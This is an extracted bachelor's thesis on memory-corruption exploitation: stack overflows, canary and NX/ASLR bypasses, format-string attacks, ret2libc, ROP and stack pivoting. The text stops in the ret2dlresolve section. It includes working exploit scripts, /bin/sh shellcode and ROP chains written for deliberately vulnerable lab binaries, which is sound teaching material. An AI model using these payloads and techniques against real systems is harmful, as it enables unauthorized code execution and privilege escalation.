BINARY EXPLOITATION: Memory corruption - GRAU EN ENGINYERIA INFORMÀTICA
←
→
Page content transcription
If your browser does not render page correctly, please read the page content below
Treball nal de grau GRAU EN ENGINYERIA INFORMÀTICA Facultat de Matemàtiques i Informàtica Universitat de Barcelona BINARY EXPLOITATION: Memory corruption Autor: Oriol Ornaque Blázquez Director: Raúl Roca Cánovas Realitzat a: Departament de Matemàtiques i Informàtica Barcelona, 20 de juny de 2021
Binary exploitation Memory corruption Oriol Ornaque Blázquez Abstract Binaries, or programs compiled down to executables, might come with errors or bugs that could trigger behavior unintended by their authors. By carefully understanding the envi- ronment where programs get executed, the instructions and the memory, an attacker can gracefully craft a specic input, tailored to trigger these unintended behaviors and gain control over the original logic of the program. One of the ways this could be achieved, is by corrupting critical values in memory. This works focuses on the main techniques to exploit buer overows and other memory corruption vulnerabilities to exploit binaries. Also a proof-of-concept for CVE-2021-3156 is presented with an analysis of its inner workings. Resum Els binaris, o programes compilats en executables, poden venir amb errors o bugs que podrien desencadenar un comportament no previst pels seus autors. Entendre acuradament l'entorn en el qual s'executen els programes, les instruccions i la memòria, permet a un atacant elaborar dades d'entrada especíques, adaptades per desencadenar aquests comportaments no desitjats i obtenir el control sobre la lògica original del programa. Una de les maneres d'aconseguir-ho és corrompent valors crítics en la memòria del programa. Aquest treball es centra en les principals tècniques per explotar desbordaments de memòria i altres vulnerabilitats de corrupció de memòria per a explotar binaris. També es presenta una prova de concepte, una demostració, de CVE-2021-3156 amb una anàlisi del seu fun- cionament. Resumen Los binarios, o programas compilados en ejecutables, pueden venir con errores o bugs que podrían desencadenar un comportamiento no previsto por sus autores. Al entender cuida- dosamente el entorno en el que se ejecutan los programas, las instrucciones y la memoria, un atacante puede elaborar datos de entrada especícos, adaptados para desencadenas estos comportamientos no deseados y obtener el control sobre la lógica original del programa. Una de las formas de conseguirlo es corrompiendo valores críticos en la memoria del programa. Este trabajo se centra en las principales técnicas para explotar desbordamientos de memoria y otras vulnerabilidades de corrupción de memoria para explotar binarios. También se presenta una prueba de concepto, una demostración, de CVE-2021-3156 con un análisis de su funcionamiento. 2
Contents 1 Stack overows 1 1.1 The stack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 1.1.1 Stack frame . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 1.1.2 Overowing the stack . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 1.2 Basic overow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 1.3 Shellcode injection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 2 Stack overow countermeasures 9 2.1 Stack canaries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 2.1.1 Check for canaries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10 2.1.2 Bypassing stack canaries . . . . . . . . . . . . . . . . . . . . . . . . . . 10 2.2 NX/DEP/W⊕X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 2.2.1 Check for NX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 2.3 ASLR/PIE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12 2.3.1 Check for ASLR/PIE . . . . . . . . . . . . . . . . . . . . . . . . . . . 12 3 Format strings 13 3.1 Format functions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 3.2 Format string vulnerability . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14 3.3 Format string exploits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14 3.3.1 Arbitrary read . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14 3.3.2 Arbitrary write . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16 4 Return-oriented programming 19 4.1 ret2libc . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19 4.2 ROP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21 4.2.1 ROP Gadgets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21 4.3 Stack pivoting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24 4.4 ret2dlresolve . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26 4.4.1 Structures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26 4.4.2 Symbol resolution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27 4.5 Sigreturn-oriented programming . . . . . . . . . . . . . . . . . . . . . . . . . 32 4.5.1 Signal handler mechanism . . . . . . . . . . . . . . . . . . . . . . . . . 33 4.5.2 sigcontext struct . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33 4.5.3 SROP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33 3
4 CONTENTS 5 Heap exploits 37 5.1 The heap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37 5.2 glibc malloc . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37 5.2.1 Common terms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37 5.3 Heap overows . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39 5.4 Use-After-Free . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40 5.5 Double free . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41 5.6 Unlink . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43 6 Fuzzing 45 6.1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45 6.2 Code coverage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45 6.3 Types of fuzzers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45 6.3.1 Input seed . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46 6.3.2 Input structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46 6.3.3 Program knowledge . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47 7 Practical case 49 7.1 CVE-2021-3156 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49 7.1.1 Weakness . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49 7.1.2 Bug . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49 7.1.3 Exploitation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51 A CVEs and CWEs 57 A.1 CVE Program . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57 A.1.1 CVE IDs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57 A.1.2 CNAs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57 A.2 CWE Program . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57 Bibliography 63
Chapter 1 Stack overows 1.1 The stack The most common way for CPUs to implement procedure or subroutine calls is by the means of a stack[6]. Thanks to its last-in rst-out nature, the stack is a simple and eective solution when you call a subroutine, you push the address to keep track of the order of the callings: of the next instruction onto the stack and once the subroutine has nished executing you can return where you left by popping the previously pushed address. The address of the next instruction pushed on the stack is called the return address. 1 void do_something() { 2 do_something_a(); 3 // 2 4 do_something_b(); 5 // 3 6 } 7 8 int main() { 9 do_something(); 10 // 1 11 return 0; 12 } stack do_something_a() do_something_b() do_something() @2 @3 empty @1 @1 @1 @1 @1 empty time push @1 push @2 pop @2 push @3 pop @3 pop @1 Figure 1.1: Simplied stack timeline 1
2 Stack overows This stack coexists in the main memory of the computer along the code and the data and for Intel x86 and x86_64 CPUs, it is controlled by two registers: the stack pointer and the base pointer. 1.1.1 Stack frame The stack holds much more information that just the execution path that the program has taken. It also holds local variables, the previous base pointer before the call and subroutine arguments and return values (it may vary between calling conventions). To group all that data associated with a subroutine call, we use the term stack frame, and it is composed of the following components (in push order): 1. Parameters of the subroutine. In 64-bit Linux, the default calling convention species that the rst 5 parameters must be passed on registers instead of the stack. 2. Return address. 3. Locals of the subroutine. The stack drawed in Figure 1.2 is an example of stack frame for the foo procedure. 1 void foo( int arg ) 1 foo: 0x00...00 2 { 2 push ebp a 3 int a; 3 mov ebp, esp 4 } 4 sub esp, 4 5 5 ... saved bp 6 int main() 6 foo's stack frame 7 { 7 main: saved ip 8 foo(1); 8 ... 9 9 push 1 10 return 0; 10 call foo arg 11 } 11 ... 0xff...ff Figure 1.2: Standard C 32-bit calling convention stack layout 1.1.2 Overowing the stack Now that we know that the stack contains a mix of modiable variables and critical data like the return address comes an important question: Can we modify the return address? Indeed. Consider the following stack, Figure 1.3. It has a local variable called buffer that spans for n bytes. If we ll that buer with n+1 bytes, the excess of 1 byte will overwrite partially the saved base pointer (bp). To overwrite the return address we just need to ll the buer with n + sizeof(bp) + sizeof(ip) bytes. When the processor nishes executing the subroutine, it will pop the return address and set the instruction pointer register to that value, executing the bytes found at that address as code. By choosing precise values for the return address we can redirect code execution wherever we want.
1.2 Basic overow 3 0x00...00 buffer Writing on buffer saved bp saved ip 0xff...ff Figure 1.3: Buer on the stack 1.2 Basic overow To do a basic stack overow I recommend using a premade environment with all the pro- tections disabled to focus on the basic exploit. For this rst example, I will use the virtual machine Phoenix found at exploit.education, specically the level Stack4 . 1 /* ... */ 2 void complete_level() { Win function 3 printf("Congratulations, you've finished " LEVELNAME " :-) Well done!\n"); 4 exit(0); 5 } 6 7 void start_level() { 8 char buffer[64]; Buer on the stack 9 void *ret; 10 11 gets(buffer); Vulnerable function 12 13 ret = __builtin_return_address(0); 14 printf("and will be returning to %p\n", ret); 15 } 16 17 int main(int argc, char **argv) { 18 printf("%s\n", BANNER); 19 start_level(); 20 } Figure 1.4: Stack4@Phoenix On this level we found a ret2win exercise. The code contains a function win that is never called but is present on the binary. The goal is to execute that function overwriting the return address to point to the address of win. In order to achieve the stack overow we need to input more data than expected so we can overow the buer on the stack and override the
4 Stack overows return address. There are a few functions in the C Standard Library that do not perform bounds checking on the input received: in this particular case, we are presented with the function gets. A quick look into the man page of that function reveals the vulnerability on the bugs section. Figure 1.5: man 3 gets: Bugs section We need to supply gets with the following data: 1. 64 bytes of junk for the buer 2. 8 bytes of junk for the ret local variable 3. 8 bytes of junk for the stack alignment padding[6] 4. 8 bytes of junk for the saved base pointer 5. 8 bytes with the address of complete_level for the return address To nd the address of complete_level we can use a debugger like gdb. A simple Python 2.7 script will do the job. Listing 1.1: stack4_exploit.py 1 exploit = "\x41" * 64 # for the buffer 2 exploit += "\x41" * 8 # for the ret local var 3 exploit += "\x41" * 8 # for stack alignment padding 4 exploit += "\x41" * 8 # for the rbp 5 exploit += "\x1d\x06\x40\x00\x00\x00\x00\x00" # address of complete_level in little-endian 6 print exploit And we are done. Figure 1.6: Exploiting Stack4 Some last thoughts on why that exploit was possible: We knew in advance the address where complete_level was loaded No bounds checking was performed on the user input There was nothing checking the integrity of the stack frame
1.3 Shellcode injection 5 1.3 Shellcode injection In the last exploit we returned to the win function to solve the challenge. But in the general case we want to achieve arbitrary code execution, not just returning to the functions already present in the binary. This can be done by passing as input the machine code of the instructions we would like to execute and override the return address to point to wherever we store that machine code, thus injecting and executing the shellcode. Take a look at the next exercise: Stack5 from the Phoenix VM. 1 /* ... */ 2 3 void start_level() { 4 char buffer[128]; 5 gets(buffer); 6 } 7 8 int main(int argc, char **argv) { 9 printf("%s\n", BANNER); 10 start_level(); 11 } The program is very similar to the Stack4 : a buer on the stack and a call to gets, that we know is vulnerable to overows. On the last exploit, almost all of our input was just junk bytes. In this exploit, we are going to use that junk space to store the shellcode and the return address will point to the start of the shellcode. If the last exploit was called ret2win because we returned to the win function this exploit could be named ret2stack or ret2buer because we will be returning to the buer on the stack. You could assemble your own shellcode manually, but I am going to use this shellcode found at shell-storm.org that performs an execve("/bin/sh"). The format of the input to gets will be: 1. 27 bytes of shellcode 2. 128 − len(shellcode) bytes of NOPs to ll the buer 3. 8 bytes of NOPs for the saved base pointer 4. 8 bytes with the address of the start of the buer, where our shellcode is located We will change the junk bytes with NOP opcodes (0x90) because we are now executing instructions on the stack. If the CPU starts executing and nds random bytes, it will launch an invalid opcode exception and kill the process. In this particular case it does not matter because the shellcode is at the beginning and the execve will replace the process image with the one from /bin/sh, including the stack but while you are debugging the shellcode and the exploit they can be essential. In my gdb debugging session I found the address of the start of the buer to be 0x7fffffffe490, and so I plugged that number into my exploit script. 1 exploit = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48"\ 2 "\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" 3 exploit += "\x90" * (128 - len(exploit))
6 Stack overows 4 exploit += "\x90" * 8 5 exploit += "\x90\xe4\xff\xff\xff\x7f\x00\x00" 6 print exploit Inside the debugger the script worked, but outside it failed. Taking a closer look into the error we can see that the value for the rsp register once we returned from start_level is dierent from the value it had inside the debugger. This oset causes us to jump to a wrong address and instead of our shellcode the CPU is trying to execute random bytes and thus, provoking an illegal opcode trap. We have to account for that dierence in our script. 0x7fffffffe490 Debugged process Shellcode gdb env Normal process Shellcode 0x7fffffffe4e0 Figure 1.7: Stack osets between debugged process and non debugged process 0x...570 − 0x...520 = 0x50 We have to add this oset to the start of the buer, 0x...490. 0x...490 + 0x50 = 0x...4e0 This problem did not happen in the last challenge because we were not returning to the stack but to a function in the binary. Listing 1.2: stack5_exploit.py 1 exploit = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48"\ 2 "\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
1.3 Shellcode injection 7 3 exploit += "\x90" * (128 - len(exploit)) 4 exploit += "\x90" * 8 5 exploit += "\xe0\xe4\xff\xff\xff\x7f\x00\x00" 6 print exploit One last thing. The shell runs in interactive mode by default and it expects to be connected to stdin. If you do not redirect standard input to the shell, it will close automatically upon start, so you need to concatenate the python output with standard input and pass everything to the executable. Some thoughts on why this exploit was possible: We knew in advance the address of the buer on the stack. No bounds checking was performed on the user input. There was nothing checking the integrity of the stack frame. We could execute instructions stored on the stack.
8 Stack overows
Chapter 2 Stack overow countermeasures 2.1 Stack canaries Stack canaries are secret values placed between local buers and the return ad- dress. This value is checked before a function returns and if the value has changed, that means that it has been overwritten and the return address may be overwritten too, possibly indicating a stack overow attack. When that situation happens, the program automatically exits to prevent the stack overow. The value of the canary is changed every time the program starts to make it unpredictable. This countermeasure is design to check for the stack frame integrity, detecting when a possible stack overow has occurred. buer canary saved bp saved ip Figure 2.1: Stack canary Figure 2.2: foo function without and with stack canary Checking for a value every time a function returns comes with a performance penalty and for that reason compilers allow opting out from using stack canaries. Compilers usually compile with stack protectors by default. To compile a program without stack canaries in gcc use the -fno-stack-protector option. Some compilers have options to specify which functions 9
10 Stack overow countermeasures you want to be compiled with stack canaries to achieve a trade-o between performance and security. Figure 2.3: man gcc 2.1.1 Check for canaries To check for the existence of canaries on a binary we can take a look at the disassembled code or we can search for the symbol __stack_chk_fail[8], the function that checks the canary integrity. 1 readelf -s a.out | grep -q '__stack_chk_fail' 2.1.2 Bypassing stack canaries Leaking the stack canary Stack canaries are not bulletproof though and can be bypassed. If you include the stack canary value in your input when you overow the stack the canary checking function will not detect the stack overow. Note that the canary value in the input must align with the canary value in the stack. So to bypass the canary we need to know its value, a value that changes every time the binary is executed. If we could make the binary reveal its contents in runtime we could read the canary value. We have to leak it (see subsection 3.3.1). Bruteforcing the stack canary There is also a bruteforce approach to processes that use the fork function for POSIX systems. fork copies the hole process image from the parent to the child, stack canaries included. Therefore, the canaries are the same for both the child and the parent. This is useful for programs like web servers that use fork to handle the incoming connections. The bruteforce approach consist of leaking the canary one byte at the time. Listing 2.1: Pseudocode for bruteforcing a canary in a fork program 1 uint8_t canary[STACK_CANARY_WIDTH]; 2 3 for(int i = 0; i < STACK_CANARY_WIDTH; ++i) 4 {
2.2 NX/DEP/W⊕X 11 5 for(int j = 0; j < 256; ++j) 6 { 7 canary[i] = j; 8 send(buffer + canary[:i+1]); /* only send the first i bytes of the canary */ 9 if(!fork_child_crashed) 10 break; 11 } 12 } This algorithm reduces the entropy space from 256STACK_CANARY_WIDTH to 256×STACK_CANARY_WIDTH. Bypass using Exception Handling Another technique to bypass stack canaries consist of triggering an exception before the canary is checked. If the attacker can overwrite an exception handler structure and trigger the exception a SEH based stack overow exploit could be executed.[9] Replace the canary value Replace the authoritative canary value in the .data section of the program. Because the canary is computed at runtime the section where it resides must be marked as writable. To use this technique an arbitrary write is needed. Arbitrary writes An arbitrary write implies the ability to write an arbitrary value to an arbitrary memory location marked as writable. This means that we can write values on addresses that are not contiguous to our overow, giving us the possibility to overwrite the return address without having to overwrite the stack canary. 2.2 NX/DEP/W⊕X NX is a protection that marks a memory region as non-executable. Dierent operating systems and architectures present dierent mechanism to implement the same concept. On Microsoft Windows it is called Data Execution Protection. On BSD systems it is called write ⊕ execute, refering to the rule that no memory section should be marked as writable and executable at the same time. The terms can, and they will, be used interchangeably. On the previous exploit we returned to the stack where we loaded instructions. Now, if the stack is marked as non-executable, those instructions on the stack cannot be executed: the CPU will throw an exception. 2.2.1 Check for NX To check for this security feature on a binary we can take a look at the permissions of the section where the stack will be loaded[8]. Again, this depends on the compiler, the OS and the architecture. 1 readelf -W -l a.out | grep 'GNU_STACK'
12 Stack overow countermeasures 2.3 ASLR/PIE ASLR is the acronym of Address Space Layout Randomization. It is a feature that ran- domizes the location of the libraries on the process memory, rendering useless attacks with hardcoded addresses, like our second exploit. Every time an executable is launched, the OS needs to create the process memory space and the loader loads the dynamic libraries the process requires on certain addresses. Conven- tionally, those addresses were resolved at compile time and were included on the executable. The executable format contains indications for the OS on how to create its process and where it expects the libraries to be located. That caused that the addresses of the libraries where known and predictable. To make them harder to exploit, the kernel randomizes the location of those libraries every time the executable is executed. To compile a program without ASLR/PIE support on gcc use the no-PIE option. 2.3.1 Check for ASLR/PIE For ASLR to work, the operating system needs to support it and applications must be compiled with ASLR in mind. Because the load locations are unknown at compile time, the compiler needs to create a Position Independent Code or Executable. To check if the OS has ASLR enabled: 1 cat /proc/sys/kernel/randomize_va_space 2 # 0 = Disabled 3 # 1 = Conservative randomization 4 # 2 = Full randomization To check if a binary has been compiled with ASLR support[8]: 1 readelf -h a.out | grep "DYN" Additionally, in Linux systems we can use the LD_TRACE_LOADED_OBJECTS environment vari- able to modify the behavior of the loader, which prints out the dynamic library dependencies and their addresses where they were loaded at runtime. In systems with ASLR enabled, those addresses will be dierent each time the same command is executed. In systems where ASLR is disabled, the addresses will always be the same. Figure 2.4: libc base address loaded at runtime with ASLR enabled/disabled
Chapter 3 Format strings 3.1 Format functions C uses the concept of format strings to specify some functions how their arguments should be treated. Those functions are unique in the way they use a variable number of arguments, as opposed to the xed number of arguments normal functions have in statically typed languages like C. The format string indicates the function how to interpret the arguments received. Some examples of this type of functions are: printf (fprintf, sprintf, vsnprintf, ...) scanf (sscanf, fscanf, vfscanf, ...) These functions are often used to perform input/output with the user. They are conversion functions, representing primitive C data types in a human-readable string representation and vice versa. Vulnerabilities on input/output functions for a program are a recurrent theme in cybersecurity. The format strings are a critical component of the function as they dictate how the arguments should be processed. Conversion specier Meaning Takes an int from the stack and converts it to signed d decimal notation Takes an unsigned int from the stack and converts x it to hex Takes a void* from the stack and prints it as a hex p address Dereferences a const char* on the stack and reads s until null byte Dereferences an int* on the stack and writes the n number of characters written so far Table 3.1: Common format conversion speciers table 13
14 Format strings 1 int arg1, arg2, arg4; 2 char* arg3 = "Hello world"; 3 printf("%x %d %s %n\n", arg1, arg2, arg3, &arg4); 0x0...0 locals rbp Internal pointer rip from where the Address of format string format function arg1 will start matching arguments with the arg2 format string arg3 0xf...f Address of arg4 Figure 3.1: Format function stack frame The format function uses an internal pointer to know which argument corresponds with the conversion specied on the format string. This pointer increases as the function parses the format string. 3.2 Format string vulnerability If the format string can somehow be provided by the user, an attacker wins control over the behavior of the format function. Therefore, if an attacker is able to provide the format string a format string vulnerability is present. 1 int main(int argc, char* argv[]){ 2 if(argc != 2) return 1; 3 4 printf(argv[1]); Format string vulnerability 5 6 return 0; 7 } Figure 3.2: Format string vulnerability 3.3 Format string exploits 3.3.1 Arbitrary read By using the %s conversion specier we can read from an address stored on the stack. If the input buer we use is a stack allocated buer, we can put any address we want to examine
3.3 Format string exploits 15 on that buer and create an appropriate input so when the format function parses the %s specier it uses our address on the buer. rbp rip 1 int main() printf's stack frame 2 { buffer's address 3 int dummy; dummy 4 char buffer[] = dummy 5 "AAAAAAAA %x %x %s "; 6 0x41 0x41 ... 7 printf(buffer, dummy); 8 buffer main's stack frame 9 return 0; 10 } rbp rip Figure 3.3: Anatomy of an arbitrary read format string exploit The %xs speciers are used to make printf's internal pointer to the arguments point to a specic oset, in this case, to our buer. By adding more %xs we can point further down on the stack (higher addresses) and by removing them we point upwards (lower addresses). When %s is parsed, it dereferences the address pointed by the printf's internal pointer. Thanks to our padding of %xs we made it point to the buer, where we carefully placed the address we want to read from: 0x4141414141414141. Can be used to leak a stack canary. Example In this exercise we are going to read the value of the variable s3cr3t that it is not allocated on the stack. To accomplish this task, we need to input the address of s3cr3t on the start of the buer followed by format speciers. Listing 3.1: exploit.py 1 exploit = "\x08\x90\x55\x56" # address of s3cr3t 2 exploit += "_%08x" * 6 3 exploit += "_%08s" 4 print exploit 1 $ python2 exploit.py > qwe 2 $ ./a.out qwe > asd As printf parses the format string, the extra format speciers will make the internal pointer point to the start of the buer, where we carefully stored the address of our target.
16 Format strings Figure 3.4: Address of s3cr3t on the input buer The next "%s" will read the address and treat as a pointer, dereferencing the address and printing the value. Figure 3.5: Value of s3cr3t leaked 3.3.2 Arbitrary write We can employ the same technique from the arbitrary read to overwrite arbitrary memory but instead of using the %s specier we use the %n specier, which writes back to an address. The %n writes the number of bytes written so far. To control that number we can make use of padding and size modiers. Example To showcase an arbitrary write from a format string I am going to overwrite the return address without aecting the stack canary. I want to return to the win function that will print out win on the screen when executed. This function is called nowhere on the original code. Compile the code with stack canaries enabled. Figure 3.6: Compiled with stack canaries Like in the arbitrary read, the rst value we put on the input buer is the address where printf should write to, that is, the address of our return address on the stack. In this particular case I inserted multiple times the address of the buer in an eort to make the exploit more reliable against stack osets. The address is then followed by a pad of format speciers to align the %n specier with the address at the start of the buer.
3.3 Format string exploits 17 Now we need to indicate the value we want to write on the selected address. Because %n writes back the number of characters already printed, we can use padding in one of the format speciers to make it print x characters. The address of win is 0x8049256. To write that value with %n, printf needs to print 134517334 characters minus the previously printed, like the address and the padding format speciers. After the calculation, the number of characters left to print is 134517192. Listing 3.2: exploit.py 1 #exploit = "\x41\x41\x41\x41" * 8 2 exploit = "\x9c\xd0\xff\xff" * 8 # Address of return address 3 exploit += "_%08x" * 12 4 exploit += "_%134517192c" 5 exploit += "_%n" 6 print exploit It is important to unset certain environment variables that could move the stack up and down and make the exploit inconsistent. Running the exploit we execute win(). Figure 3.7: win() function executed.
18 Format strings
Chapter 4 Return-oriented programming 4.1 ret2libc In a traditional stack overow we try to return to some shellcode in a buer we can control. For this reason, a countermeasure appeared to prevent execution on writable segments (see 2.2). With this limitation, we cannot inject code anymore. The solution comes from reusing the existing code to achieve our goals, like in the ret2win example (see 1.2). Libc is a library loaded on almost all processes, so returning to a function inside libc is always an option. Furthermore, libc declares system, a very well suited win function. To perform the call to system we need to prepare the stack with the parameters that the compiler would set for a compiled call to system: 1 int system(const char* command); We require the address of command to be present on the stack, before (higher addresses) the overwritten return address. buffer ebp Address of system Address of command Figure 4.1: ret2libc stack layout Example For this example we will use a custom vulnerable 32bit program compiled with all the protections disabled, with no debugging symbols and ASLR turned o for the operating system. 19
20 Return-oriented programming Listing 4.1: example.c 1 #include 2 #include 3 4 void vuln() 5 { 6 char buffer[64]; 7 fgets(buffer, 128, stdin); 8 } 9 10 /* gcc -m32 -fno-stack-protector -no-pie (-m32) main.c */ 11 /* ASLR disabled on host */ 12 int main() 13 { 14 vuln(); 15 return 0; 16 } Using our layout for a ret2libc exploit we need to plug in the addresses of the system function and a "/bin/sh" string. Because the binary was compiled with no debugging symbols we can't search for the symbol inside gdb or another debugger. But because ASLR is disabled, we know where libc will be loaded. We could get the oset of system from the libc base address to know where it will be located at runtime. Figure 4.2: libc base address Figure 4.3: system oset from libc base address Figure 4.4: "/bin/sh" string oset from libc base address Knowing all those addresses we can plug them into a python script taking into account how the stack will unwind and what system expects to be on the stack. Listing 4.2: exploit.py 1 exploit = "\x41" * 76 2 exploit += "\x30\xc8\xe0\xf7" # system address
4.2 ROP 21 3 exploit += "\x00" * 4 # padding 4 exploit += "\x52\x93\xf5\xf7" # /bin/sh address 5 print exploit Once we crafted the exploit we need to concatenate it with stdin to obtain access to the shell (see 1.3). Figure 4.5: ret2libc exploit When compiling a binary for 64bits, the default calling convention used by gcc in Linux systems is the System V AMD64 ABI, which species that the rst 6 parameters (integers or pointers) are passed in registers instead of being pushed on the stack. That represents a problem for our ret2libc technique, as we only control the stack. To overcome this issue we will use return-oriented programming, the generalized and rened form of a ret2anything exploit. 4.2 ROP Return-oriented programming is a programming paradigm by which an attacker can in- duce arbitrary behavior in a program without code injection. This defeats the coun- termeasure of NX/DEP/W⊕X. This technique presents a whole new programming paradigm (an esoteric one): using the code of a existing program to create another program inside the process, by means of con- catenating return addresses and a stack overow. In a typical stack overow, we override the return stack writing only one address. 4.2.1 ROP Gadgets ROP Gadgets are machine code snippets that end with a ret instruction. We can chain them together by pushing their start addresses in sequence on a stack overow attack, creating a ROP chain.
22 Return-oriented programming Stack 0x4a0f: syscall; ret buffer 0xf0fee: mov 1, eax; ret rbp 0x1007f: 0x4045c mov 0, rsi; ret 0xf0fee 0x4045c: 0x75a0 xor rax, rax; ret 0x7fffffff5e70 0x75a0: 0x1007f pop rdi; ret .text 0x4a0f Figure 4.6: ROP chain Example We will use the same program for the ret2libc example, but compiled for 64bit. Because of the default calling convention for 64bit gcc binaries on Linux, we need to pass the "/bin/sh" string pointer in the register rdi. To accomplish this, we will search for gadgets on the binary. Because we control the stack thanks to the stack overow, we could use a pop rdi instruction to put our pointer into the register. Figure 4.7: ROP gadget pop rdi; ret In this case we also need a NOP gadget to achieve stack alignment. This gadget does nothing more than calling the following gadget on the chain and with this addition our whole rop chain is 32 bytes long, which is aligned for the 16 byte stack. If this gadget was omitted, the rop chain would be 24 bytes long, which is not divisible by 16 and therefore, would not be aligned. Figure 4.8: NOP gadget Before calling system we have to set up the string pointer in rdi, so this gadget will be the rst we will return to, followed by the address of "/bin/sh" and the address of system.
4.2 ROP 23 buffer rbp Address of nop gadget Address of pop rdi gadget Address of "/bin/sh" Address of system Figure 4.9: Stack layout for example We collect again the addresses of interest because we are now using the 64bit libc. Figure 4.10: libc base address at runtime Figure 4.11: system oset from libc base address Figure 4.12: "/bin/sh" oset from libc base address Listing 4.3: exploit64.py 1 exploit = "\x41" * 72 2 exploit += "\xaf\x10\x40\x00\x00\x00\x00\x00" # nop gadget for stack alignment 3 exploit += "\xe3\x11\x40\x00\x00\x00\x00\x00" # pop rdi gadget 4 exploit += "\xaa\x95\xf7\xf7\xff\x7f\x00\x00" # binsh 5 exploit += "\x10\x74\xe1\xf7\xff\x7f\x00\x00" # system 6 print exploit Again, to keep the shell open we need to concatenate the exploit with stdin.
24 Return-oriented programming Figure 4.13: Successful exploitation of the rop chain 4.3 Stack pivoting A stack pivot attack consist of creating a fake stack somewhere in memory and tricking the program to use it as its stack. This technique is useful when the legitimate stack lacks space for a ROP chain. For this attack it is necessary to control the stack pointer register to be able to change the stack of the program for the attacker controlled one. To accomplish this, we need to nd some gadgets: 1. pop rsp. Ideal gadget in theory. Hardly found in any executable. 2. xchg reg, rsp. Used in combination with pop reg to write a value on reg to later exchange it with rsp. Requires 16 bytes of stack space after the return address. 3. leave; ret. All functions except main are ended with leave; ret. That makes this case the most plausible. The leave instruction is equivalent to: 1 mov rsp, rbp 2 pop rbp If we call leave two consecutive times, the rst pop rbp will be used to set rsp on the second leave. buffer Address of fake stack Address of leave Figure 4.14: Stack layout for a stack pivoting attack Example In this exercise the objective is to pivot the stack to buffer. I will use the leave gadget to trigger the pivot.
4.3 Stack pivoting 25 First, we need the leave gadget. Figure 4.15: leave gadget The address shown in Figure 4.15 is only an oset from the base address of the binary. To make it usable add it to the base address. Once we pivoted the stack, on the leave gadget, the following ret instruction will pop from buffer the return address. In this case, I lled it with the address of win so at the end, we will jump to that function. 1 padding = 72 2 exploit += "\xed\x61\x55\x56" * 18 # address of win 3 exploit += "\x90\xd0\xff\xff" # address of buffer 4 exploit += "\x31\x61\x55\x56" # leave gadget 5 print exploit With this exploit, the sequence of instructions we want to execute is the following. 1 mov esp, ebp 2 pop ebp &buffer 3 ret leave gadget 4 mov esp, ebp Stack pivoting 5 pop ebp First 4 bytes of buffer 6 ret &win Figure 4.16: Stack pivoting example: instruction sequence Setting a breakpoint on win we can see that now, the esp register points to the user supplied buer. We have pivoted the stack.
26 Return-oriented programming Figure 4.17: esp points to buffer Figure 4.18: Succesful exploitation 4.4 ret2dlresolve Technique for executing dynamically linked functions without knowledge of their addresses. The attacker tricks the binary into resolving a function of its choice into the Procedure Linkage Table, bypassing ASLR. When the binary calls a dynamically linked function for the rst time and has lazy binding enabled (no RELRO or Partial RELRO), it is going to jump into the PLT section to try to resolve the symbol on demand. 4.4.1 Structures In order to resolve a symbol, 3 structures are needed. By faking them, we could trick the loader to resolve a symbol of our choice.
